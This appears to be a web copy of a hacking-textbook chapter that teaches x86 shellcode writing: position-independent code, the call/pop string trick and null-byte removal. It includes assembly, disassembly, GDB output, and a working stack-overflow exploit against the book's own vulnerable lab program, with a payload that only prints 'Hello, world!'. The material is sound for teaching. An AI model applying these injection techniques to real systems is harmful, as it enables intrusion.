The Path to Shellcode

8/31/2010 3:53:11 PM

the_path_to_shellcode.html

Shellcode is literally injected into a running program, where it takes over like a biological virus inside a cell. Since shellcode isn't really an executable program, we don't have the luxury of declaring the layout of data in memory or even using other memory segments. Our instructions must be self-contained and ready to take over control of the processor regardless of its current state. This is commonly referred to as position-independent code.

In shellcode, the bytes for the string "Hello, world!" must be mixed together with the bytes for the assembly instructions, since there aren't definable or predictable memory segments. This is fine as long as EIP doesn't try to interpret the string as instructions. However, to access the string as data we need a pointer to it. When the shellcode gets executed, it could be anywhere in memory. The string's absolute memory address needs to be calculated relative to EIP. Since EIP cannot be accessed from assembly instructions, however, we need to use some sort of trick.

1. Assembly Instructions Using the Stack

The stack is so integral to the x86 architecture that there are special instructions for its operations.

Instruction	Description
`push`	Push the source operand to the stack.
`pop`	Pop a value from the stack and store in the destination operand.
`call`	Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruvtion following the call is pushed to the stack, so that execution can return later.
`ret`	Return from a function, popping the return address from the stack and jumping execution there.

Stack-based exploits are made possible by the call and ret instructions. When a function is called, the return address of the next instruction is pushed to the stack, beginning the stack frame. After the function is finished, the retinstruction pops the return address from the stack and jumps EIP back there. By overwriting the stored return address on the stack before the ret instruction, we can take control of a program's execution.

This architecture can be misused in another way to solve the problem of addressing the inline string data. If the string is placed directly after a call instruction, the address of the string will get pushed to the stack as the return address. Instead of calling a function, we can jump past the string to a popinstruction that will take the address off the stack and into a register. The following assembly instructions demonstrate this technique.

1.1. helloworld1.s

Code View:

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "Hello, world!",  0x0a, 0x0d  ; with newline and carriage return bytes.

mark_below:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 15       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

The call instruction jumps execution down below the string. This also pushes the address of the next instruction to the stack, the next instruction in our case being the beginning of the string. The return address can immediately be popped from the stack into the appropriate register. Without using any memory segments, these raw instructions, injected into an existing process, will execute in a completely position-independent way. This means that, when these instructions are assembled, they cannot be linked into an executable.

Code View:

reader@hacking:~/booksrc $ nasm helloworld1.s
reader@hacking:~/booksrc $ ls -l helloworld1
-rw-r--r-- 1 reader reader 50 2007-10-26 08:30 helloworld1
reader@hacking:~/booksrc $ hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F000000        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

The nasm assembler converts assembly language into machine code and a corresponding tool called ndisasm converts machine code into assembly. These tools are used above to show the relationship between the machine code bytes and the assembly instructions. The disassembly instructions marked in bold are the bytes of the "Hello, world!" string interpreted as instructions.

Now, if we can inject this shellcode into a program and redirect EIP, the program will print out Hello, world! Let's use the familiar exploit target of the notesearch program.

Code View:

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xc6\xf9\xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault
reader@hacking:~/booksrc $

Failure. Why do you think it crashed? In situations like this, GDB is your best friend. Even if you already know the reason behind this specific crash, learning how to effectively use a debugger will help you solve many other problems in the future.

2. Investigating with GDB

Since the notesearch program runs as root, we can't debug it as a normal user. However, we also can't just attach to a running copy of it, because it exits too quickly. Another way to debug programs is with core dumps. From a root prompt, the OS can be told to dump memory when the program crashes by using the command ulimit -c unlimited. This means that dumped core files are allowed to get as big as needed. Now, when the program crashes, the memory will be dumped to disk as a core file, which can be examined using GDB.

Code View:

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc # ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc # ./notesearch $(perl -e 'print "\xa3\xf9\
xff\xbf"x40')
-------[ end of note data ]-------
Segmentation fault (core dumped)
root@hacking:/home/reader/booksrc # ls -l ./core
-rw------- 1 root root 147456 2007-10-26 08:36 ./core
root@hacking:/home/reader/booksrc # gdb -q -c ./core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Core was generated by './notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E.
Program terminated with signal 11, Segmentation fault.
#0  0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:     call   0x2c6541b7
0xbffff9a8:     ins    BYTE PTR es:[edi],[dx]
0xbffff9a9:     outs   [dx],DWORD PTR ds:[esi]
0xbffff9aa:     sub    al,0x20
0xbffff9ac:     ja     0xbffffa1d
(gdb) i r eip
eip            0x2c6541b7        0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3:     0xe8    0x0f    0x48    0x65    0x6c    0x6c    0x6f    0x2c
0xbffff9ab:     0x20    0x77    0x6f    0x72    0x6c    0x64    0x21    0x0a
0xbffff9b3:     0x0d    0x59    0xb8    0x04    0xbb    0x01    0xba    0x0f
0xbffff9bb:     0xcd    0x80    0xb8    0x01    0xbb    0xcd    0x80    0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c  |.....Hello, worl|
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba  |d!..Y...........|
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00  |................|
00000030  cd 80                                             |..|
00000032
root@hacking:/home/reader/booksrc #

Once GDB is loaded, the disassembly style is switched to Intel. Since we are running GDB as root, the .gdbinit file won't be used. The memory where the shellcode should be is examined. The instructions look incorrect, but it seems like the first incorrect call instruction is what caused the crash. At least, execution was redirected, but something went wrong with the shellcode bytes. Normally, strings are terminated by a null byte, but here, the shell was kind enough to remove these null bytes for us. This, however, totally destroys the meaning of the machine code. Often, shellcode will be injected into a process as a string, using functions like strcpy(). Such functions will simply terminate at the first null byte, producing incomplete and unusable shellcode in memory. In order for the shellcode to survive transit, it must be redesigned so it doesn't contain any null bytes.

3. Removing Null Bytes

Looking at the disassembly, it is obvious that the first null bytes come from the call instruction.

reader@hacking:~/booksrc $ ndisasm -b32 helloworld1
00000000  E80F000000        call 0x14
00000005  48                dec eax
00000006  656C              gs insb
00000008  6C                insb
00000009  6F                outsd
0000000A  2C20              sub al,0x20
0000000C  776F              ja 0x7d
0000000E  726C              jc 0x7c
00000010  64210A            and [fs:edx],ecx
00000013  0D59B80400        or eax,0x4b859
00000018  0000              add [eax],al
0000001A  BB01000000        mov ebx,0x1
0000001F  BA0F000000        mov edx,0xf
00000024  CD80              int 0x80
00000026  B801000000        mov eax,0x1
0000002B  BB00000000        mov ebx,0x0
00000030  CD80              int 0x80
reader@hacking:~/booksrc $

This instruction jumps execution forward by 19 (0x13) bytes, based on the first operand. The call instruction allows for much longer jump distances, which means that a small value like 19 will have to be padded with leading zeros resulting in null bytes.

One way around this problem takes advantage of two's complement. A small negative number will have its leading bits turned on, resulting in 0xffbytes. This means that, if we call using a negative value to move backward in execution, the machine code for that instruction won't have any null bytes. The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which, in turn, will jump back to a pop instruction at the beginning of the shellcode.

3.1. helloworld2.s

BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ;  Pop the return address (string ptr) into ecx.
  mov eax, 4        ;  Write syscall #.
  mov ebx, 1        ;  STDOUT file descriptor
  mov edx, 15       ;  Length of the string
  int 0x80          ;  Do syscall: write(1, string, 14)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes.

After assembling this new shellcode, disassembly shows that the call instruction (shown in italics below) is now free of null bytes. This solves the first and most difficult null-byte problem for this shellcode, but there are still many other null bytes (shown in bold).

Code View:

reader@hacking:~/booksrc $ nasm helloworld2.s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000  EB1E              jmp short 0x20
00000002  59                pop ecx
00000003  B804000000         mov eax,0x4
00000008  BB01000000         mov ebx,0x1
0000000D  BA0F000000         mov edx,0xf
00000012  CD80              int 0x80
00000014  B801000000         mov eax,0x1
00000019  BB00000000         mov ebx,0x0
0000001E  CD80              int 0x80
00000020  E8DDFFFFFF        call 0x2 
00000025  48                dec eax
00000026  656C              gs insb
00000028  6C                insb
00000029  6F                outsd
0000002A  2C20              sub al,0x20
0000002C  776F              ja 0x9d
0000002E  726C              jc 0x9c
00000030  64210A            and [fs:edx],ecx
00000033  0D                db 0x0D
reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of register widths and addressing. Notice that the first jmp instruction is actually jmp short. This means execution can only jump a maximum of approximately 128 bytes in either direction. The normal jmp instruction, as well as the call instruction (which has no short version), allows for much longer jumps. The difference between assembled machine code for the two jump varieties is shown below:

	EB 1E              jmp short 0x20

versus

	E9 1E 00 00 00     jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits in width. The E stands for extended, because these were originally 16-bit registers called AX, BX, CX, DX, SI, DI, BP, and SP. These original 16-bit versions of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register. Furthermore, the individual bytes of the AX, BX, CX, and DX registers can be accessed as 8-bit registers called AL, AH, BL, BH, CL, CH, DL, and DH, where L stands for low byte and H for high byte. Naturally, assembly instructions using the smaller registers only need to specify operands up to the register's bit width. The three variations of a mov instruction are shown below.

Machine code	Assembly
`B8 04 00 00 00`	`mov eax,0x4`
`66 B8 04 00`	`mov ax,0x4`
`B0 04`	`mov al,0x4`

Using the AL, BL, CL, or DL register will put the correct least significant byte into the corresponding extended register without creating any null bytes in the machine code. However, the top three bytes of the register could still contain anything. This is especially true for shellcode, since it will be taking over another process. If we want the 32-bit register values to be correct, we need to zero out the entire register before the mov instructions—but this, again, must be done without using null bytes. Here are some more simple assembly instructions for your arsenal. These first two are small instructions that increment and decrement their operand by one.

Instruction	Description
`inc`	Increment the target operand by adding 1 to it.
`dec`	Decrement the target operand by subtracting 1 from it.

The next few instructions, like the mov instruction, have two operands. They all do simple arithmetic and bitwise logical operations between the two operands, storing the result in the first operand.

Instruction	Description
`add ,`	Add the source operand to the destination operand, storing the result in the destination.
`sub ,`	Subtract the source operand from the destination operand, storing the result in the destination.
`or ,`	Perform a bitwise `or` logic operation, comparing each bit of one operand with the corresponding bit of the other operand. 1 or 0 = 1 1 or 1 = 1 0 or 1 = 1 0 or 0 = 0 If the source bit or the destination bit is on, or if both of them are on, the result bit is on; otherwise, the result is off. The final result is stored in the destination operand.
`and ,`	Perform a bitwise `and` logic operation, comparing each bit of one operand with the corresponding bit of the other operand. 1 or 0 = 0 1 or 1 = 1 0 or 1 = 0 0 or 0 = 0 The result bit is on only if both the source bit and the destination bit are on. The final result is stored in the destination operand.
`xor ,`	Perform a bitwise exclusive `or (xor)` logical operation, comparing each bit of one operand with the corresponding bit of the other operand. 1 or 0 = 1 1 or 1 = 0 0 or 1 = 1 0 or 0 = 0 If the bits differ, the result bit is on; if the bits are the same, the result bit is off. The final result is stored in the destination operand.

One method is to move an arbitrary 32-bit number into the register and then subtract that value from the register using the mov and sub instructions:

	B8 44 33 22 11        mov eax,0x11223344
	2D 44 33 22 11        sub eax,0x11223344

While this technique works, it takes 10 bytes to zero out a single register, making the assembled shellcode larger than necessary. Can you think of a way to optimize this technique? The DWORD value specified in each instruction comprises 80 percent of the code. Subtracting any value from itself also produces 0 and doesn't require any static data. This can be done with a single two-byte instruction:

	29 C0               sub eax,eax

Using the sub instruction will work fine when zeroing registers at the beginning of shellcode. This instruction will modify processor flags, which are used for branching, however. For that reason, there is a preferred two-byte instruction that is used to zero registers in most shellcode. The xor instruction performs an ex clusive or operation on the bits in a register. Since 1 xor ed with 1 results in a 0, and 0 xored with 0 results in a 0, any value xor ed with itself will result in 0. This is the same result as with any value subtracted from itself, but the xor instruction doesn't modify processor flags, so it's considered to be a cleaner method.

	31 C0                 xor eax,eax

You can safely use the sub instruction to zero registers (if done at the beginning of the shellcode), but the xor instruction is most commonly used in shellcode in the wild. This next revision of the shellcode makes use of the smaller registers and the xor instruction to avoid null bytes. The inc and decinstructions have also been used when possible to make for even smaller shellcode.

3.2. helloworld3.s

BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 15        ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d  ; with newline and carriage return bytes.

After assembling this shellcode, hexdump and grep are used to quickly check it for null bytes.

Code View:

reader@hacking:~/booksrc $ nasm helloworld3.s
reader@hacking:~/booksrc $ hexdump -C helloworld3 | grep --color=auto 00
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 0f cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 48 65 6c 6c 6f 2c  |..K.......Hello,|
00000020  20 77 6f 72 6c 64 21 0a  0d                       | world!..|
00000029
reader@hacking:~/booksrc $

Now this shellcode is usable, as it doesn't contain any null bytes. When used with an exploit, the notesearch program is coerced into greeting the world like a newbie.

Code View:

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld3)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9bc
reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking :~/booksrc $

Other

Shell-Spawning Shellcode

Port-Binding Shellcode

Connect-Back Shellcode

Hacking :System Daemons

Hacking - Tools of the Trade

Hacking - Overlooking the Obvious

Hacking - Advanced Camouflage

Hacking - The Whole Infrastructure

Payload Smuggling

Buffer Restrictions